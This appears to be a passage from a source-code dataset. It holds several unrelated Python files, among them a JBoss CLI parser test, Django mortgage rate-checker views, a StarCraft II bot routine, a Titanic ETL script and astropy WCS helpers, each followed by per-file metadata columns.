test_data = "/subsystem=datasources/data-source=ExampleDS:dump-queued-threads-in-pool()"
desired_operation = {
"operation": "dump-queued-threads-in-pool",
"address": ["subsystem", "datasources", "data-source", "ExampleDS"]
}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_single_param_http_post(self):
"""See if command with multiple pathresult, operation, and single param return correctly using HTTP POST"""
test_data = "/core-service=management/service=configuration-changes:add(max-history=200)"
desired_operation = {
"operation": "add", "max-history": "200",
"address": ["core-service", "management", "service", "configuration-changes"]
}
result = jboss_command_to_http_request(test_data, desired_operation)
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_multiple_param_http_post(self):
"""See if command with multiple pathresult, operation, and multiple params return correctly using HTTP POST"""
test_data = "/subsystem=datasources/data-source=ExampleDS:write-attribute(name=max-pool-size,value=5000)"
desired_operation = {
"operation": "write-attribute", "name": "max-pool-size", "value": "5000",
"address": ["subsystem", "datasources", "data-source", "ExampleDS"]
}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
if __name__ == '__main__':
unittest.main()
| 50.810185 | 149 | 0.710251 | 10,848 | 0.988428 | 0 | 0 | 0 | 0 | 0 | 0 | 4,922 | 0.448474 |
25e0e386f4839503cf27575ea15bd5ecf033d49a | 113 | py | Python | src/__init__.py | logic-and-learning/AdvisoRL | 3bbd741e681e6ea72562fec142d54e9d781d097d | [
"MIT"
] | 4 | 2021-02-04T17:33:07.000Z | 2022-01-24T10:29:39.000Z | src/__init__.py | logic-and-learning/AdvisoRL | 3bbd741e681e6ea72562fec142d54e9d781d097d | [
"MIT"
] | null | null | null | src/__init__.py | logic-and-learning/AdvisoRL | 3bbd741e681e6ea72562fec142d54e9d781d097d | [
"MIT"
] | null | null | null | from . import baselines
from . import common
from . import reward_machines
from . import rl
from . import worlds
| 18.833333 | 29 | 0.778761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
25e3a85a64f47b2e6d11cb21908d899ff2ec1f13 | 1,328 | py | Python | hipo_rank/summarizers/textrank.py | MehwishFatimah/Hipo_modified | 6844dc9d8bf0d2f7fc5f6159e8ee463219a1c107 | [
"MIT"
] | null | null | null | hipo_rank/summarizers/textrank.py | MehwishFatimah/Hipo_modified | 6844dc9d8bf0d2f7fc5f6159e8ee463219a1c107 | [
"MIT"
] | null | null | null | hipo_rank/summarizers/textrank.py | MehwishFatimah/Hipo_modified | 6844dc9d8bf0d2f7fc5f6159e8ee463219a1c107 | [
"MIT"
] | null | null | null | from hipo_rank import Scores, Document, Summary
from summa.summarizer import summarize
class TextRankSummarizer:
def __init__(self, num_words: int = 200, stay_under_num_words: bool = False):
print('\n-------------------------\ninit textrank\n-------------------------\n')
self.num_words = num_words
self.stay_under_num_words = stay_under_num_words
def get_summary(self, doc: Document, sorted_scores: Scores = None) -> Summary:
print('\n-------------------------\nget_summary\n-------------------------\n')
sentences = []
sect_idxs = []
local_idxs = []
# flatten data
for sect_idx, section in enumerate(doc.sections):
for local_idx, sentence in enumerate(section.sentences):
print('sentence: {}\n local_idx:{}\n sect_idx: {}\n'.format(sentence, local_idx, sect_idx))
sentences.append(sentence)
sect_idxs.append(sect_idx)
local_idxs.append(local_idxs)
sentences = summarize(" ".join(sentences), scores=True, words=self.num_words)
summary = [(s[0], s[1], 0, 0, 0) for s in sentences]
print('summary len: {}'.format(len(summary)))
print('\n-------------------------\nexit get_summary\n-------------------------\n')
return summary
| 42.83871 | 107 | 0.557229 | 1,236 | 0.930723 | 0 | 0 | 0 | 0 | 0 | 0 | 300 | 0.225904 |
25e441bb1d41908f9089cf20c37bdbf87f2df670 | 8,415 | py | Python | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | 1 | 2019-02-25T21:46:14.000Z | 2019-02-25T21:46:14.000Z | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | null | null | null | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | null | null | null | from django.db.models import Q, Sum, Avg
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from ratechecker.models import Region, Rate, Adjustment, Fee
from ratechecker.ratechecker_parameters import ParamsSerializer
def get_rates(params_data, data_load_testing=False, return_fees=False):
""" params_data is a method parameter of type RateCheckerParameters."""
# the precalculated results are done by favoring negative points over
# positive ones, and the API does the opposite
factor = 1
if data_load_testing:
factor = -1
region_ids = list(Region.objects.filter(
state_id=params_data.get('state')).values_list('region_id', flat=True))
if not region_ids:
return {'data': {}, 'timestamp': None}
rates = Rate.objects.filter(
region_id__in=region_ids,
product__loan_purpose=params_data.get('loan_purpose'),
product__pmt_type=params_data.get('rate_structure'),
product__loan_type=params_data.get('loan_type'),
product__max_ltv__gte=params_data.get('max_ltv'),
product__loan_term=params_data.get('loan_term'),
product__max_loan_amt__gte=params_data.get('loan_amount'),
product__max_fico__gte=params_data.get('maxfico'),
product__min_fico__lte=params_data.get('minfico'))
if params_data.get('loan_type') != 'FHA-HB':
rates = rates.filter(
product__min_loan_amt__lte=params_data.get('loan_amount'))
if params_data.get('rate_structure') == 'ARM':
rates = rates.filter(
product__int_adj_term=params_data.get('arm_type')[:-2],
product__io=bool(params_data.get('io')))
if data_load_testing:
rates = rates.filter(
product__institution=params_data.get('institution'),
lock=params_data.get('lock'))
else:
rates = rates.filter(
lock__lte=params_data.get('max_lock', 0),
lock__gt=params_data.get('min_lock', 0))
all_rates = []
products = {}
for rate in rates:
all_rates.append(rate)
products["{}{}".format(
rate.product_id, rate.region_id)] = rate.product_id
product_ids = products.values()
adjustments = Adjustment.objects.filter(
product__plan_id__in=product_ids).filter(
Q(max_loan_amt__gte=params_data.get('loan_amount'))
| Q(max_loan_amt__isnull=True),
Q(min_loan_amt__lte=params_data.get('loan_amount'))
| Q(min_loan_amt__isnull=True),
Q(prop_type=params_data.get('property_type'))
| Q(prop_type__isnull=True) | Q(prop_type=""),
Q(state=params_data.get('state'))
| Q(state__isnull=True) | Q(state=""),
Q(max_fico__gte=params_data.get('maxfico'))
| Q(max_fico__isnull=True),
Q(min_fico__lte=params_data.get('minfico'))
| Q(min_fico__isnull=True),
Q(min_ltv__lte=params_data.get('min_ltv'))
| Q(min_ltv__isnull=True),
Q(max_ltv__gte=params_data.get('max_ltv'))
| Q(max_ltv__isnull=True),
).values('product_id',
'affect_rate_type').annotate(sum_of_adjvalue=Sum('adj_value'))
summed_adj_dict = {}
for adj in adjustments:
current = summed_adj_dict.get(adj['product_id'], {})
current[adj['affect_rate_type']] = adj['sum_of_adjvalue']
summed_adj_dict[adj['product_id']] = current
available_rates = {}
data_timestamp = ""
for rate in all_rates:
# TODO: check that it the same all the time, and do what if it is not?
data_timestamp = rate.data_timestamp
product = summed_adj_dict.get(rate.product_id, {})
rate.total_points += product.get('P', 0)
rate.base_rate += product.get('R', 0)
distance = abs(params_data.get('points') - rate.total_points)
if float(distance) > 0.5:
continue
if rate.product_id not in available_rates:
available_rates[rate.product_id] = rate
else:
current_difference = abs(
params_data.get('points') -
available_rates[rate.product_id].total_points
)
new_difference = abs(params_data.get('points') - rate.total_points)
if new_difference < current_difference or (
new_difference == current_difference and
factor * available_rates[
rate.product_id].total_points < 0 and
factor * rate.total_points > 0):
available_rates[rate.product_id] = rate
data = {}
for rate in available_rates:
key = str(available_rates[rate].base_rate)
current_value = data.get(key, 0)
if data_load_testing:
data[key] = "%s" % available_rates[rate].total_points
else:
data[key] = current_value + 1
results = {'data': data, 'timestamp': data_timestamp}
if return_fees and data:
fees = Fee.objects.filter(plan__plan_id__in=available_rates.keys(),
state_id=params_data.get('state'))
if params_data.get('property_type', 'SF') == 'SF':
fees = fees.filter(single_family=True)
elif params_data.get('property_type', 'SF') == 'CONDO':
fees = fees.filter(condo=True)
elif params_data.get('property_type', 'SF') == 'COOP':
fees = fees.filter(coop=True)
averages = fees.aggregate(
origination_dollar=Avg('origination_dollar'),
origination_percent=Avg('origination_percent'),
third_party=Avg('third_party'))
results['fees'] = averages
if not data:
obj = Region.objects.first()
if obj:
results['timestamp'] = obj.data_timestamp
return results
def set_lock_max_min(data):
"""Set max and min lock values before serializer validation"""
lock_map = {
'30': (0, 30),
'45': (31, 45),
'60': (46, 60)
}
lock = data.get('lock')
if lock and lock in lock_map:
data['min_lock'] = lock_map[lock][0]
data['max_lock'] = lock_map[lock][1]
return data
else:
return data
@api_view(['GET'])
def rate_checker(request):
"""
Return available rates in percentage and number of institutions
with the corresponding rate
(i.e. "4.75": 2 means there are 2 institutions with the rate of 4.75%)
"""
if request.method == 'GET':
# Clean the parameters, make sure no leading or trailing spaces,
# transform them to upper cases
fixed_data = dict(map(
lambda (k, v): (k, v.strip().upper()),
request.query_params.iteritems()))
fixed_data = set_lock_max_min(fixed_data)
serializer = ParamsSerializer(data=fixed_data)
if serializer.is_valid():
rate_results = get_rates(serializer.validated_data)
rate_results['request'] = serializer.validated_data
return Response(rate_results)
else:
return Response(serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET'])
def rate_checker_fees(request):
"""
Return available rates in percentage and number of institutions
with the corresponding rate along with fees data
"""
if request.method == 'GET':
# Clean the parameters, make sure no leading or trailing spaces,
# transform them to upper cases
fixed_data = dict(map(
lambda (k, v): (k, v.strip().upper()),
request.query_params.iteritems()))
serializer = ParamsSerializer(data=fixed_data)
if serializer.is_valid():
rate_results = get_rates(
serializer.validated_data, return_fees=True)
rate_results['request'] = serializer.validated_data
return Response(rate_results)
else:
return Response(
serializer.errors, status=status.HTTP_400_BAD_REQUEST
)
class RateCheckerStatus(APIView):
def get(self, request, format=None):
try:
load_ts = Region.objects.latest('data_timestamp').data_timestamp
except Region.DoesNotExist:
load_ts = None
return Response({'load': load_ts})
| 36.907895 | 79 | 0.627213 | 271 | 0.032204 | 0 | 0 | 1,831 | 0.217588 | 0 | 0 | 1,556 | 0.184908 |
25e493076be7380951a97b3f9afcdfcdb4f2cbab | 2,247 | py | Python | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | 2 | 2020-08-13T01:25:20.000Z | 2020-11-22T19:00:06.000Z | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | null | null | null | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | null | null | null | from sc2.ids.effect_id import EffectId
from sc2.position import Point2
from sc2.units import Units
from sharpy.managers.combat2 import MicroStep, Action, MoveType
from sc2 import AbilityId
from sc2.unit import Unit
class MicroVoidrays(MicroStep):
def should_retreat(self, unit: Unit) -> bool:
if unit.shield_max + unit.health_max > 0:
health_percentage = (unit.shield + unit.health) / (unit.shield_max + unit.health_max)
else:
health_percentage = 0
if health_percentage < 0.2 or unit.weapon_cooldown < 0:
# low hp or unit can't attack
return True
for effect in self.ai.state.effects:
if effect.id == EffectId.RAVAGERCORROSIVEBILECP:
if Point2.center(effect.positions).distance_to(unit) < 3:
return True
if effect.id == EffectId.BLINDINGCLOUDCP:
if Point2.center(effect.positions).distance_to(unit) < 4:
return True
if effect.id == EffectId.PSISTORMPERSISTENT:
if Point2.center(effect.positions).distance_to(unit) < 4:
return True
return False
def group_solve_combat(self, units: Units, current_command: Action) -> Action:
return current_command
def unit_solve_combat(self, unit: Unit, current_command: Action) -> Action:
if self.engage_ratio < 0.25 and self.can_engage_ratio < 0.25:
return current_command
if self.move_type in {MoveType.PanicRetreat, MoveType.DefensiveRetreat}:
return current_command
if self.cd_manager.is_ready(unit.tag, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT):
close_enemies = self.cache.enemy_in_range(unit.position, 7).filter(lambda u: u.is_armored)
if close_enemies:
return Action(None, False, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT)
if not self.should_shoot() and self.should_retreat(unit):
pos = self.pather.find_weak_influence_air(unit.position, 4)
return Action(pos, False)
return self.focus_fire(unit, current_command, None)
def should_shoot(self):
tick = self.ai.state.game_loop % 24
return tick < 8
| 40.854545 | 102 | 0.655986 | 2,029 | 0.902982 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.012906 |
25e59c2417ca0a19fe3514be2c7d45d995e484b2 | 2,861 | py | Python | codegen.py | EXXETA/k8s-python-tools | 5cf57ea934fc11522ea42e9aa5a4e2f35af6a893 | [
"Apache-2.0"
] | 1 | 2019-09-18T09:43:15.000Z | 2019-09-18T09:43:15.000Z | codegen.py | EXXETA/k8s-python-tools | 5cf57ea934fc11522ea42e9aa5a4e2f35af6a893 | [
"Apache-2.0"
] | null | null | null | codegen.py | EXXETA/k8s-python-tools | 5cf57ea934fc11522ea42e9aa5a4e2f35af6a893 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2019 EXXETA AG and others.
#
# This file is part of k8s-python-tools
# (see https://github.com/EXXETA/k8s-python-tools).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import re
from jinja2 import Environment, FileSystemLoader
"""load self-defined generated_library.yml and use this information to generate api methods.
using jinja2 templating engine to generate python files
"""
__location__ = os.path.join(os.getcwd(), os.path.dirname(__file__))
try:
from yaml import CLoader as Loader, CDumper as Dumper, load
except ImportError:
from yaml import Loader, Dumper
text_io = open(os.path.join(__location__, 'generated_library.yml'), 'r')
data = load(text_io, Loader=Loader)
text_io.close()
env = Environment(
loader=FileSystemLoader(os.path.join(__location__, "templates")),
# autoescape=select_autoescape(['html'])
)
def camelcase_to_snake_case(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
env.filters['normalize'] = camelcase_to_snake_case
# generating api methods
for i in data["lib_def"]:
file_name = data["lib_def"][i]["file"]
template_name = data["lib_def"][i]["template"]
entries = data["lib_def"][i]["entries"]
print("generated", "./lib/" + file_name)
template = env.get_template(template_name)
rendered = template.render(entries=entries)
f = open(os.path.join(__location__, "./lib/" + file_name), "w")
f.write(rendered)
f.close()
# generating api actions
for i in data["actions"]:
base_path = data["actions"][i]["destination"]
template_name = data["actions"][i]["template"]
entries = data["actions"][i]["entries"]
print("auto-generated", len(entries), "actions in destination", base_path)
template = env.get_template(template_name)
for item in entries:
rendered = template.render(item=item)
f = open(os.path.join(__location__, "./lib/" + base_path + "/" +
camelcase_to_snake_case(item["name"]) + ".py"), "w")
f.write(rendered)
f.close()
print("OK")
| 32.511364 | 92 | 0.695211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,477 | 0.516253 |
25e663ed5a1d36a9f0c450a6e3fe032554c705e8 | 5,375 | py | Python | gammapy/utils/wcs.py | grburgess/gammapy | 609e460698caca7223afeef5e71826c7b32728d1 | [
"BSD-3-Clause"
] | 3 | 2019-01-28T12:21:14.000Z | 2019-02-10T19:58:07.000Z | gammapy/utils/wcs.py | grburgess/gammapy | 609e460698caca7223afeef5e71826c7b32728d1 | [
"BSD-3-Clause"
] | null | null | null | gammapy/utils/wcs.py | grburgess/gammapy | 609e460698caca7223afeef5e71826c7b32728d1 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""WCS related utility functions."""
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from astropy.wcs import WCS
from astropy.coordinates import Angle
__all__ = [
'linear_wcs_to_arrays',
'linear_arrays_to_wcs',
'get_wcs_ctype',
'get_resampled_wcs'
]
def get_wcs_ctype(wcs):
"""
Get celestial coordinate type of WCS instance.
Parameters
----------
wcs : `~astropy.wcs.WCS`
WCS transformation instance.
Returns
-------
ctype : {'galatic', 'icrs'}
String specifying the coordinate type, that can be used with
`~astropy.coordinates.SkyCoord`
"""
ctype = wcs.wcs.ctype
if 'GLON' in ctype[0] or 'GLON' in ctype[1]:
return 'galactic'
elif 'RA' in ctype[0] or 'RA' in ctype[1]:
return 'icrs'
else:
raise TypeError("Can't determine WCS coordinate type.")
def get_resampled_wcs(wcs, factor, downsampled):
"""
Get resampled WCS object.
"""
wcs = wcs.deepcopy()
if not downsampled:
factor = 1. / factor
wcs.wcs.cdelt *= factor
wcs.wcs.crpix = (wcs.wcs.crpix - 0.5) / factor + 0.5
return wcs
def linear_wcs_to_arrays(wcs, nbins_x, nbins_y):
"""Make a 2D linear binning from a WCS object.
This method gives the correct answer only for linear X, Y binning.
The method expects angular quantities in the WCS object.
X is identified with WCS axis 1, Y is identified with WCS axis 2.
The method needs the number of bins as input, since it is not in
the WCS object.
Parameters
----------
wcs : `~astropy.wcs.WCS`
WCS object describing the bin coordinates
nbins_x : int
number of bins in X coordinate
nbins_y : int
number of bins in Y coordinate
Returns
-------
bin_edges_x : `~astropy.coordinates.Angle`
array with the bin edges for the X coordinate
bin_edges_y : `~astropy.coordinates.Angle`
array with the bin edges for the Y coordinate
"""
# check number of dimensions
if wcs.wcs.naxis != 2:
raise ValueError("Expected exactly 2 dimensions, got {}"
.format(wcs.wcs.naxis))
# check that wcs axes are linear
# TODO: is there an easy way to do this?
# set bins
unit_x, unit_y = wcs.wcs.cunit
delta_x, delta_y = wcs.wcs.cdelt
delta_x = Angle(delta_x, unit_x)
delta_y = Angle(delta_y, unit_y)
bin_edges_x = np.arange(nbins_x + 1) * delta_x
bin_edges_y = np.arange(nbins_y + 1) * delta_y
# translate bins to correct values according to WCS reference
# In FITS, the edge of the image is at pixel coordinate +0.5.
refpix_x, refpix_y = wcs.wcs.crpix
refval_x, refval_y = wcs.wcs.crval
refval_x = Angle(refval_x, unit_x)
refval_y = Angle(refval_y, unit_y)
bin_edges_x += refval_x - (refpix_x - 0.5) * delta_x
bin_edges_y += refval_y - (refpix_y - 0.5) * delta_y
# set small values (compared to delta (i.e. step)) to 0
for i in np.arange(len(bin_edges_x)):
if np.abs(bin_edges_x[i] / delta_x) < 1.e-10:
bin_edges_x[i] = Angle(0., unit_x)
for i in np.arange(len(bin_edges_y)):
if np.abs(bin_edges_y[i] / delta_y) < 1.e-10:
bin_edges_y[i] = Angle(0., unit_y)
return bin_edges_x, bin_edges_y
def linear_arrays_to_wcs(name_x, name_y, bin_edges_x, bin_edges_y):
"""Make a 2D linear WCS object from arrays of bin edges.
This method gives the correct answer only for linear X, Y binning.
X is identified with WCS axis 1, Y is identified with WCS axis 2.
Parameters
----------
name_x : str
name of X coordinate, to be used as 'CTYPE' value
name_y : str
name of Y coordinate, to be used as 'CTYPE' value
bin_edges_x : `~astropy.coordinates.Angle`
array with the bin edges for the X coordinate
bin_edges_y : `~astropy.coordinates.Angle`
array with the bin edges for the Y coordinate
Returns
-------
wcs : `~astropy.wcs.WCS`
WCS object describing the bin coordinates
"""
# check units
unit_x = bin_edges_x.unit
unit_y = bin_edges_y.unit
if unit_x != unit_y:
ss_error = "Units of X ({0}) and Y ({1}) bins do not match!".format(
unit_x, unit_y)
ss_error += " Is this expected?"
raise ValueError(ss_error)
# Create a new WCS object. The number of axes must be set from the start
wcs = WCS(naxis=2)
# Set up DET coordinates in degrees
nbins_x = len(bin_edges_x) - 1
nbins_y = len(bin_edges_y) - 1
range_x = Angle([bin_edges_x[0], bin_edges_x[-1]])
range_y = Angle([bin_edges_y[0], bin_edges_y[-1]])
delta_x = (range_x[1] - range_x[0]) / nbins_x
delta_y = (range_y[1] - range_y[0]) / nbins_y
wcs.wcs.ctype = [name_x, name_y]
wcs.wcs.cunit = [unit_x, unit_y]
wcs.wcs.cdelt = [delta_x.to(unit_x).value, delta_y.to(unit_y).value]
# ref as lower left corner (start of (X, Y) bin coordinates)
# coordinate start at pix = 0.5
wcs.wcs.crpix = [0.5, 0.5]
wcs.wcs.crval = [(bin_edges_x[0] + (wcs.wcs.crpix[0] - 0.5) * delta_x).to(unit_x).value,
(bin_edges_y[0] + (wcs.wcs.crpix[1] - 0.5) * delta_y).to(unit_y).value]
return wcs
| 32.97546 | 92 | 0.638884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,713 | 0.504744 |
25e697ff2f7be1cfd4b989db2606e8b827aeb0d8 | 2,503 | py | Python | module2-sql-for-analysis/titantic_ETL.py | elliotgunn/DS-Unit-3-Sprint-2-SQL-and-Databases | c730e2b3e66199226fa7549511cbb7801eb7a694 | [
"MIT"
] | null | null | null | module2-sql-for-analysis/titantic_ETL.py | elliotgunn/DS-Unit-3-Sprint-2-SQL-and-Databases | c730e2b3e66199226fa7549511cbb7801eb7a694 | [
"MIT"
] | null | null | null | module2-sql-for-analysis/titantic_ETL.py | elliotgunn/DS-Unit-3-Sprint-2-SQL-and-Databases | c730e2b3e66199226fa7549511cbb7801eb7a694 | [
"MIT"
] | null | null | null | import pandas as pd
import psycopg2
import sqlite3
# don't commit this
dbname = ''
user = ''
password = ''
host = ''
pg_conn = psycopg2.connect(dbname=dbname, user=user,
password=password, host=host)
# connection object and cursor
pg_conn
pg_curs = pg_conn.cursor()
# extract: csv file
titanic_csv = 'titanic.csv'
df = pd.read_csv(titanic_csv)
df['Name'] = df['Name'].str.replace("'", "")
# create connection to blank sql 'titanic.sqlite3'
conn = sqlite3.connect('titanic.sqlite3')
# thus extract data from df to sql file
df.to_sql('titanic', conn, index=False, if_exists='replace') # Insert the values from the csv file into the table 'X'
# look at table
curs = conn.cursor()
query = 'SELECT * FROM titanic LIMIT 20'
pd.read_sql(query, conn)
t_curs = conn.cursor()
query = 'SELECT COUNT(*) FROM titanic;'
t_curs.execute(query).fetchall()
# our goal - an ETL/data pipeline from SQLite to Python
titanic = t_curs.execute('SELECT * FROM titanic;').fetchall()
# validate what we got
titanic[0]
# look at data types
t_curs.execute('PRAGMA table_info(titanic);').fetchall()
# extract done! next step, transform:
# we need the postgresql db to have a table
# with an appropriate schema
# we need a serial primary key as it's what links
# all the tables together
create_titanic_table = """
CREATE TABLE titanic (
id SERIAL PRIMARY KEY,
Survived INT,
Pclass INT,
Name VARCHAR(100),
Sex VARCHAR(10),
Age REAL,
Siblings_Spouses_Aboard INT,
Parents_Children_Aboard INT,
Fare REAL
);
"""
# create pg table
pg_curs.execute(create_titanic_table)
str(titanic[0])
# transform (making the target ready to get data) done
# now we need to insert actual characters
# example first
example_insert = """
INSERT INTO titanic
(Survived, PClass, Name, Sex, Age, Siblings_Spouses_Aboard, Parents_Children_Aboard, Fare)
VALUES """ + str(titanic[0])
print(example_insert)
# now do this for all characters
for row in titanic: # this refers to titanic in row 25
insert_titanic = """
INSERT INTO titanic
(Survived, PClass, Name, Sex, Age, Siblings_Spouses_Aboard, Parents_Children_Aboard, Fare)
VALUES """ + str(titanic[0]) + ';'
pg_curs.execute(insert_titanic)
# In[243]:
pg_curs.execute('SELECT * FROM titanic;')
pg_curs.fetchall()
# we can see it from this cursor but not elephantsql.com
# we must commit
pg_curs.close()
pg_conn.commit()
| 20.349593 | 117 | 0.688374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,548 | 0.618458 |
25e777cd87df8c4a209cc04015cb7b7c4813329d | 999 | py | Python | merceedge/util/yaml.py | merceedge/MerceEdge | b1448fbaed912e04e1c71d3f2101f2f297eca794 | [
"Apache-2.0"
] | 6 | 2019-01-25T09:03:27.000Z | 2021-02-17T14:30:06.000Z | merceedge/util/yaml.py | merceedge/MerceEdge | b1448fbaed912e04e1c71d3f2101f2f297eca794 | [
"Apache-2.0"
] | null | null | null | merceedge/util/yaml.py | merceedge/MerceEdge | b1448fbaed912e04e1c71d3f2101f2f297eca794 | [
"Apache-2.0"
] | null | null | null | import yaml
from merceedge.exceptions import MerceEdgeError
from merceedge.settings import (
logger_access,
logger_code,
logger_console
)
_LOGGER = logger_code
def load_yaml(fname):
"""Load a YAML file."""
try:
with open(fname, encoding='utf-8') as conf_file:
# If configuration file is empty YAML returns None
# We convert that to an empty dict
return yaml.safe_load(conf_file) or {}
except yaml.YAMLError:
error = 'Error reading YAML configuration file {}'.format(fname)
_LOGGER.exception(error)
raise MerceEdgeError(error)
def write_yaml(fname, yaml_dict):
"""Write a yaml file from dict"""
try:
with open(fname, 'w', encoding='utf-8') as outfile:
yaml.dump(yaml_dict, outfile, default_flow_style=False)
except yaml.YAMLError:
error = 'Error write YAML configuration file {}'.format(fname)
_LOGGER.exception(error)
raise MerceEdgeError(error)
| 29.382353 | 72 | 0.660661 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 239 | 0.239239 |
25e918b72fd4f7774d359e037858b76d4d02a0ff | 4,891 | py | Python | manifest-build-tools/application/generate_manifest.py | dalebremner/on-tools | 18b826bca2a3608c5b50116ec710bbeb630a586e | [
"Apache-2.0"
] | 4 | 2015-12-08T20:02:53.000Z | 2019-03-08T07:42:24.000Z | manifest-build-tools/application/generate_manifest.py | dalebremner/on-tools | 18b826bca2a3608c5b50116ec710bbeb630a586e | [
"Apache-2.0"
] | 48 | 2016-01-28T23:50:38.000Z | 2017-10-20T13:38:03.000Z | manifest-build-tools/application/generate_manifest.py | dalebremner/on-tools | 18b826bca2a3608c5b50116ec710bbeb630a586e | [
"Apache-2.0"
] | 38 | 2015-11-02T23:49:37.000Z | 2021-05-27T01:24:03.000Z | #!/usr/bin/env python
# Copyright 2016, DELLEMC, Inc.
"""
The script generate a new manifest for a new branch according to another manifest.
For example,
new branch: release/branch-1.2.3
date: 2016-12-15 00:00:00
The generated new manifest: branch-1.2.3-20161215
usage:
./on-tools/manifest-build-tools/HWIMO-BUILD on-tools/manifest-build-tools/application/generate_manifest.py \
--branch master \
--date "$date" \
--timezone "+0800" \
--builddir b \
--force \
--git-credential https://github.com,GITHUB \
--jobs 8
The required parameters:
branch: The branch name of each repository in manifest file.
date: The commit of each repository are last commit before the date.
The valid date: current (the commit of each repository are the lastest commit")
yesterday (the commit of each repository are the last commit of yesterday")
date string, such as: 2016-12-01 00:00:00 (the commit of each repository are the last commit before the date")
timezone: The Time Zone for the date, such as: +0800, -0800, -0500
git-credential: Git credentials for CI services.
builddir: The directory for checked repositories.
The optional parameters:
force: If true, overwrite the destination manifest file even it already exists.
jobs: number of parallel jobs to run. The number is related to the compute architecture, multi-core processors...
"""
import os
import sys
import argparse
from dateutil.parser import parse
from datetime import datetime,timedelta
try:
import common
from ManifestGenerator import *
except ImportError as import_err:
print import_err
sys.exit(1)
def parse_command_line(args):
"""
Parse script arguments.
:return: Parsed args for assignment
"""
parser = argparse.ArgumentParser()
parser.add_argument("--branch",
required=True,
help="The branch of repositories in new manifest",
action="store")
parser.add_argument("--date",
default="current",
required=True,
help="Generate a new manifest with commit before the date, such as: current, yesterday, 2016-12-13 00:00:00",
action="store")
parser.add_argument("--timezone",
default="+0800",
required=True,
help="The time zone for parameter date",
action="store")
parser.add_argument("--builddir",
required=True,
help="destination for checked out repositories",
action="store")
parser.add_argument("--git-credential",
required=True,
help="Git credential for CI services",
action="append")
parser.add_argument("--force",
help="use destination manifest file, even if it exists",
action="store_true")
parser.add_argument("--jobs",
default=1,
help="Number of parallel jobs to run",
type=int)
parsed_args = parser.parse_args(args)
return parsed_args
def convert_date(date_str):
try:
if date_str == "yesterday":
utc_now = datetime.utcnow()
utc_yesterday = utc_now + timedelta(days=-1)
date = utc_yesterday.strftime('%Y%m%d 23:59:59')
dt = parse(date)
return dt
else:
dt = parse(date_str)
return dt
except Exception, e:
raise ValueError(e)
def main():
try:
# parse arguments
args = parse_command_line(sys.argv[1:])
slice_branch = args.branch.split("/")[-1]
if args.date == "current":
utc_now = datetime.utcnow()
day_str = utc_now.strftime("%Y%m%d")
dest_manifest = "{branch}-{day}".format(branch=slice_branch, day=day_str)
generator = ManifestGenerator(dest_manifest, args.branch, args.builddir, args.git_credential, jobs=args.jobs, force=args.force)
else:
dt = convert_date(args.date)
day_str = dt.strftime("%Y%m%d")
dest_manifest = "{branch}-{day}".format(branch=slice_branch, day=day_str)
date_str = "{0} {1}".format(dt.strftime("%Y-%m-%d %H:%M:%S"), args.timezone)
generator = SpecifyDayManifestGenerator(dest_manifest, args.branch, date_str, args.builddir, args.git_credential, jobs=args.jobs, force=args.force)
generator.update_manifest()
generator.generate_manifest()
except Exception, e:
print "Failed to generate new manifest for {0} due to \n{1}\nExiting now".format(args.branch, e)
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| 36.774436 | 159 | 0.605193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,145 | 0.438561 |
25ed07e02dd91398ea331f8eb818d839d1301c57 | 1,132 | py | Python | src/infer_cgg.py | lepidodendron/lepidodendron | 1ca3efd2d43d2a644cf364ba811e16aad6a25f2b | [
"MIT"
] | null | null | null | src/infer_cgg.py | lepidodendron/lepidodendron | 1ca3efd2d43d2a644cf364ba811e16aad6a25f2b | [
"MIT"
